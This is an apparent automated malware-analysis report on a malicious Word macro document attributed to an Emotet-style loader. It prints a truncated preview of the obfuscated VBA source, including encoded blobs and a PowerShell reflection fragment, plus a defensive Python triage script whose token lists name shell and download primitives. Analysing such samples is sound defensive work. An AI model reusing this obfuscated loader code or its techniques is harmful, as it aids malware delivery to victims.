Verdict: MALICIOUS
Risk score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing a VBA macro. The macro auto-executes through an AutoOpen procedure and calls CreateObject, the COM-instantiation primitive that document downloaders use to obtain objects such as WScript.Shell, XMLHTTP or ADODB.Stream for fetching and running a second-stage payload. The preview below stops before the procedure that performs that call, so the download-and-execute behaviour is inferred from the static heuristics rather than observed. The ClamAV signature Doc.Malware.Emodldr-10025032-0, whose family name denotes an Emotet-style document loader, corroborates the static findings.
Heuristics (8)

- [critical] CLAMAV_DETECTION: ClamAV: Doc.Malware.Emodldr-10025032-0. ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0.
- [medium] OLE_VBA_MACROS: VBA macros detected (3 related findings). Document contains VBA macro code.
- [high] OLE_VBA_AUTOOPEN: AutoOpen macro. The VBA project defines an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled.
- [high] OLE_VBA_CREATEOBJ: CreateObject call. The macro calls CreateObject, which instantiates an arbitrary COM object by ProgID; in downloaders this is how the shell, HTTP and file-stream objects are obtained.
- [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens. The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, and documents whose source extraction failed, where no visible source is available.
- [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker. The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- [info] EXTRACTED_FILE_STATIC_TRIAGE: Suspicious extracted artifact. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- [info] EMBEDDED_URL: Embedded URL. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier, not a download location.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35049 bytes |

SHA-256: 97d0238929ae0d92d875dc85e3d03aab4454d5d57db69028978633ed9505deaa

Detection
ClamAV: No threats found (the signature listed under Heuristics fired on the parent document, not on the carved macro source).
Obfuscation or payload: likely. Carved artifact contains 26 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "WcmbSWTF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zwzhmsDL"
Function fcJcLzuJi()
On Error Resume Next
NHAWw = 13839 / Round(FOYFA) + bVfLNL - CStr(9093) * wNMFP * YaCzjv * fMoRUr * LEZlEO
UWQTp = pQtnQ
tjhMH = AoMVhd("rtnVA0ADAAMgA2ADQAMAAzAGUAYQA3AGYAMgA2ADYAYwBmADEAYgA3ADUANAA0AGMAYwBjADEAMQBkAGEAYwA2AGIAYwA5ADYAMAA3AGEAOQAyADAANQA1AGIAZQBiAGIANQA3AGIAYQAyAGQAMgBjADUAYgA0%i17", 5, 154)
PliLZY = 10275 / Round(vJrutT) + FrnaBA - CStr(46089) * Dmfrd * OSAAn * rjtAMw * YLfWaV
jZGNOj = ibZthb
hPNtna = 81670 / Round(SCKRUj) + zqiVV - CStr(40835) * qzmRjN * SSVFRH * ilRjIP * RTONw
JhCROX = YPGVu
twsoQwa = AoMVhd("UJ45BhADIAZAAzADQAZQA1ADQANgBkADcAMwAwADAAYQBiADEANAA5ADUAZQBkAGIAYgAzADUANQBiADIAYwA1AGIAYgBlADEAMAAxADEANABlAGEANgBkAGIAYQA3ADQAYgA0n7", 5, 130)
JzkpLD = 54081 / Round(UEQpMF) + YiYEj - CStr(55824) * lPDrt * IOivl * GHhiCK * woclc
Sdzli = KzjOU
BWJPz = 82803 / Round(HfJWoX) + DTEAGY - CStr(48577) * Soqffa * iMzwcI * YiUlu * wrGiGX
aNIuho = DUZUL
oiVqnAbbWlS = AoMVhd("nSX9jAGQAZQA5ADcANABkADEAYwBlAGMAMgAzAGYAZABlADAAYwA2ADgANgBiADQAMwBmAoF", 6, 65)
dBwYp = 90570 / Round(vvZfV) + pAaiHZ - CStr(14714) * DQEDQn * EDFAZ * GvuhsL * nincZD
EcmRvD = ZksVY
jHmKf = 666 / Round(Xzjfl) + bHfDm - CStr(38929) * kGiMm * EmOGS * HXNGOz * rIvXiu
EzQWqr = laaYZ
jBDtfLhCfjw = AoMVhd("oKGC19..250))) ) ))25", 5, 15)
JvPJs = 27159 / Round(dzOBRG) + cAojA - CStr(35801) * RGWsPa * WwmhpZ * vsliUL * EjPEk
rllrYG = rptRdn
KcTbH = 56372 / Round(RjjGo) + qDcko - CStr(18081) * ljOaiU * iszuRB * UVktOO * tJFkm
sAXRaD = aaNtsn
mOptEUjD = AoMVhd("vjG.((varIABle '*MDr*').NaME[3,11,2]-JOin'')(([RUNtiME.InteRopserVICeS.MARShAL]::([runTIMe.InTerOpsERvicES.mArSHal].geTmeMberSCk8Kv", 4, 123)
aYlpom = 75703 / Round(irrZv) + saJqv - CStr(48945) * hUfUO * zuHqA * kwUXPv * HWSfaA
jhzDD = NWsEGV
QICIz = 89066 / Round(DRbaAQ) + BfzNVR - CStr(96389) * AWAMK * fwwFEf * KsMkbh * SViITH
pwcBt = wIfIk
alWbBhh = AoMVhd("nngAMwA2ADYANQA1ADcAMgA5AGIAOAA3AGMAYQBkADUANAA5AGQANgA3ADIAZgA0AGMAZgA5ADUAMgA0ADcANwA1AGUAYgBjADAAZAA5ADUAZgAyAGUANwBmAGEAYwBhAGIAMABjAMXTV", 3, 135)
wYTiUv = 71817 / Round(qnmct) + PAisss - CStr(6047) * pAUDL * oCMEz * lKzrJM * AjBLAI
HwdnP = hliSKQ
swwhUE = 48226 / Round(tiDrYw) + IcZiCP - CStr(22644) * ZlPhi * TjQuj * cbhjpv * FuRNR
ZMKoi = ZjZYwF
iJjdvWvN = AoMVhd("0RCYUANwAzADEANAAwADvj", 5, 16)
uXaBm = 95011 / Round(HBhuss) + FGiHY - CStr(95791) * EwJsmA * IDCla * Bmftf * ZzYfQ
mmTZvQ = IupaR
QlSmi = 74115 / Round(zzwiHC) + pXflr - CStr(63180) * IMiMmt * JsbAkD * mtNzKj * vwQtrE
dQCrz = IYoZv
ismMTMOh = AoMVhd("ArvUAKUJ", 4, 2)
zoEWiW = 98782 / Round(CdSlj) + sNQOTv - CStr(77795) * fcYIl * jOFoER * ErZhXr * UAwQLz
vIZGzE = IbzakR
FPPnn = 43533 / Round(BwSSl) + nNizkX - CStr(16065) * IwTDSA * mjZmS * szWvEa * AZZnc
WQpOTn = HzSvk
DzkbGK = AoMVhd("RGAOQBkADYAYgBiADMANQA0ADcAYgAwADAANwBkADAAMgBjADgANwBlADcAZAA4ADAANAAxAGYAMgAyAGUAYgAyAGUANABlAGEAMgA2AGUANgA0AGEAZQA0ADcAMwA5AGEANAA2ADkAZgBhAGIAMQBkAGEAZQBhAGIAZQBjADkAYwAzAGQAZgA5ADgAZgA5AGYANwBiAGh48wp", 3, 199)
VsPPs = 63083 / Round(DuQMC) + zrtiWf - CStr(50582) * iBwUG * CUviaK * EYkJhG * sbzdM
qYNOvQ = zrrTu
nbLYCr = 56850 / Round(GSZqQ) + azGjJL - CStr(33074) * fRTMjK * WwMCaw * NNabYH * sGvcjV
QpSbJ = wuEqL
wXfSh = AoMVhd("@niAMQA5AGMAYQA4AGQAYQBmAGMANwA4ADgAMgAyAGMAYQAxAGYw.dj", 4, 48)
dkVMn = 79506 / Round(ilsGhm) + rnKYj - CStr(99328) * oFHubR * wTJkQF * BWuHmC * PXjkoz
IjfGL = piOSMX
vRPUqw = 46769 / Round(RTUKt) + QiWGA - CStr(53363) * iirbd * pEfRvF * CPrWV * TurUC
rwJKo = iXlNnX
mrEOWaWXVw = AoMVhd("uREIANABlADkAYwA5AGMANQA0AGYAMgX88C", 4, 28)
NWiUlB = 48022 / Round(UzArz) + tINqKp - CStr(7144) * dftrhQ * npcTdI * kaGSdT * wJToz
OXWdip = tCatUI
PhWcC = 96918 / Round(NtuZz) + KicMA - CStr(91468) * sfSlY * XFZZaj * KWBYo * pCfzrA
ZSCjqb = TVjOkE
jUFnzLm = AoMVhd("4AGYAZAA1ADMAO
... (truncated)
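The preview shows the obfuscation style an analyst has to work through: filler arithmetic on undefined variables (harmless under On Error Resume Next), long base64-like literals, and every literal passed through one helper, AoMVhd("...", start, length), whose body is not in the preview. The following script is an added example, not code from the analyzer or the sample, that re-implements the kind of static checks behind the OLE_VBA_AUTOOPEN, OLE_VBA_CREATEOBJ, auto-exec-with-execution-tokens and EXTRACTED_FILE_STATIC_TRIAGE findings on a carved macro source, and adds two aids specific to this style: finding the dominant slicing helper and measuring how much of the file is junk. It runs offline on a constructed excerpt: a few lines copied from the preview plus a hypothetical AutoOpen/CreateObject stub (the real carve's entry point and CreateObject call lie past the truncation and are not shown on this page). The blob length and count thresholds are assumptions.

```python
"""Static triage of an extracted VBA macro source (e.g. olevba's macros.bas carve).

Added example: mirrors the report's auto-exec / execution-token / base64-blob
heuristics and locates the string-slicing helper used for obfuscation.
"""
import re
from collections import Counter

# Auto-execution entry points for Word/Excel macros (the names olevba also checks).
AUTOEXEC_NAMES = (
    "AutoOpen", "AutoExec", "AutoNew", "AutoClose", "AutoExit",
    "Document_Open", "Document_Close", "Document_New",
    "Workbook_Open", "Workbook_Activate", "Auto_Open", "Auto_Close",
)
# Object-creation, shell and download tokens; deliberately broad, an analyst reviews hits.
EXEC_TOKENS = (
    "CreateObject", "GetObject", "Shell", "WScript.Shell", "ShellExecute",
    "URLDownloadToFile", "XMLHTTP", "WinHttpRequest", "ADODB.Stream",
    "powershell", "cmd.exe", "CallByName",
)
AUTOEXEC_RE = re.compile(
    r"\b(?:Sub|Function)\s+(" + "|".join(AUTOEXEC_NAMES) + r")\b", re.IGNORECASE)
# helper("literal", start, length): the Mid-style slice/decode stub seen in the preview.
SLICE_CALL_RE = re.compile(r'\b(\w+)\("((?:[^"]|"")*)",\s*(\d+),\s*(\d+)\)')
# Filler of the form  x = 13839 / Round(y) + ...  that never affects control flow.
JUNK_ARITH_RE = re.compile(r"=\s*\d+\s*/\s*Round\(\w+\)")


def find_autoexec(src):
    """Auto-exec procedure names defined in the source."""
    return sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)})


def find_exec_tokens(src):
    """Execution/download tokens present as whole words (case-insensitive)."""
    return [t for t in EXEC_TOKENS
            if re.search(r"(?<!\w)" + re.escape(t) + r"(?!\w)", src, re.IGNORECASE)]


def count_base64_blobs(src, min_len=40):
    """Runs of base64 alphabet at least min_len long (the report's 'long base64-like blobs')."""
    return len(re.findall(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, src))


def slice_calls(src):
    """(helper, literal, start, length) for every helper("...", n, m) call in the source."""
    return [(m.group(1), m.group(2), int(m.group(3)), int(m.group(4)))
            for m in SLICE_CALL_RE.finditer(src)]


def dominant_helper(src):
    """Most-called slicing helper: the first function to reverse when deobfuscating."""
    names = Counter(c[0] for c in slice_calls(src))
    return names.most_common(1)[0][0] if names else None


def junk_line_ratio(src):
    """Fraction of non-blank lines that are filler arithmetic."""
    lines = [ln for ln in src.splitlines() if ln.strip()]
    return sum(1 for ln in lines if JUNK_ARITH_RE.search(ln)) / len(lines) if lines else 0.0


def triage(src, blob_threshold=2):
    """Summarise findings with labels modelled on the report's heuristic IDs."""
    auto, execs, blobs = find_autoexec(src), find_exec_tokens(src), count_base64_blobs(src)
    findings = []
    if auto:
        findings.append("OLE_VBA_AUTOOPEN")
    if "CreateObject" in execs:
        findings.append("OLE_VBA_CREATEOBJ")
    if auto and execs:               # auto-exec together with execution tokens
        findings.append("AUTOEXEC_WITH_EXEC_TOKENS")
    if blobs >= blob_threshold:      # threshold is an assumption; the report counted 26
        findings.append("EXTRACTED_FILE_STATIC_TRIAGE")
    return {"autoexec": auto, "exec_tokens": execs, "base64_blobs": blobs,
            "slice_helper": dominant_helper(src),
            "junk_ratio": junk_line_ratio(src), "findings": findings}


# Constructed excerpt: a few lines copied from the preview (junk arithmetic and AoMVhd
# calls) plus a hypothetical AutoOpen/CreateObject stub. Not the full 35049-byte carve.
SAMPLE_VBA = r'''Attribute VB_Name = "zwzhmsDL"
Function fcJcLzuJi()
On Error Resume Next
NHAWw = 13839 / Round(FOYFA) + bVfLNL - CStr(9093) * wNMFP * YaCzjv
UWQTp = pQtnQ
tjhMH = AoMVhd("rtnVA0ADAAMgA2ADQAMAAzAGUAYQA3AGYAMgA2ADYAYwBmADEAYgA3ADUANAA0AGMAYwBjADEAMQBkAGEAYwA2AGIAYwA5ADYAMAA3AGEAOQAyADAANQA1AGIAZQBiAGIANQA3AGIAYQAyAGQAMgBjADUAYgA0%i17", 5, 154)
PliLZY = 10275 / Round(vJrutT) + FrnaBA - CStr(46089) * Dmfrd * OSAAn
jZGNOj = ibZthb
twsoQwa = AoMVhd("UJ45BhADIAZAAzADQAZQA1ADQANgBkADcAMwAwADAAYQBiADEANAA5ADUAZQBkAGIAYgAzADUANQBiADIAYwA1AGIAYgBlADEAMAAxADEANABlAGEANgBkAGIAYQA3ADQAYgA0n7", 5, 130)
jBDtfLhCfjw = AoMVhd("oKGC19..250))) ) ))25", 5, 15)
ismMTMOh = AoMVhd("ArvUAKUJ", 4, 2)
End Function
Sub AutoOpen()
    ' hypothetical stub standing in for the real entry point (not from the sample)
    Set hObj = CreateObject(fcJcLzuJi())
End Sub
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key:14} {value}")
```

Run against the real macros.bas (olevba -c writes the decoded source; its --decode and --reveal options undo the stock Base64/Hex/StrReverse encodings but not a custom slice helper), the dominant-helper output tells you which function to reimplement or instrument first; the blob count you get will depend on the length threshold, which is an assumption here rather than the analyzer's setting.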